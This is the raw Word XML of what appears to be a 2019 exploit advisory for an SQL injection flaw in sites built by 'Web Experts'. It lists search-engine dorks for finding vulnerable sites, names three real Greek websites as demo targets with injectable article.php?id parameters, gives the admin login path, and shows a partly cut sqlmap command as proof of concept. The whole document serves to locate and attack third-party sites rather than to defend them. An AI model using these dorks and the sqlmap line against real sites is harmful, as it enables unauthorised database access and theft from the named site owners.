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06" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t xml:space="preserve"># Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Title</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:Designed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Developed by Web Experts SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t># Date</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:02.06.2019</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t># Dork1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:intext:Designed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Developed by Web Experts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inurl:english</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>article.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t># Dork2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:inurl:</w:t>
      </w:r>
      <w:r w:rsidR="00854EFF">
        <w:t>english</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00854EFF">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00854EFF">
        <w:t>article.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00854EFF">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="00854EFF" w:rsidP="008A0706">
      <w:r>
        <w:t xml:space="preserve"># Tested </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>Reverse check bing.com</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>#Demo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>https://fgm.com.gr/english/article.php?id=31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>https://www.dancearchive.gr/english/article.php?id=6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>https://sotiriadelli.gr/article.php?id=8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t># Admin control panel path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>site.com/administration/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706">
      <w:r>
        <w:t>sqlmap.py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 xml:space="preserve"> --batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0706" w:rsidRDefault="008A0706" w:rsidP="008A0706"/>
    <w:p w:rsidR="006D2284" w:rsidRDefault="006D2284" w:rsidP="008A0706"/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71" w:rsidRDefault="00D06371" w:rsidP="008A0706">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D06371" w:rsidRDefault="00D06371" w:rsidP="008A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71" w:rsidRDefault="00D06371" w:rsidP="008A0706">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D06371" w:rsidRDefault="00D06371" w:rsidP="008A0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24"/>
    <w:rsid w:val="004B1B7C"/>
    <w:rsid w:val="006D2284"/>
    <w:rsid w:val="006F192B"/>
    <w:rsid w:val="008035C4"/>
    <w:rsid w:val="00847B12"/>
    <w:rsid w:val="00854EFF"/>
    <w:rsid w:val="008A0706"/>
    <w:rsid w:val="00C03ED0"/>
    <w:rsid w:val="00CC622F"/>
    <w:rsid w:val="00CF34FF"/>
    <w:rsid w:val="00D06371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7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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-03T06:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-03T06:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>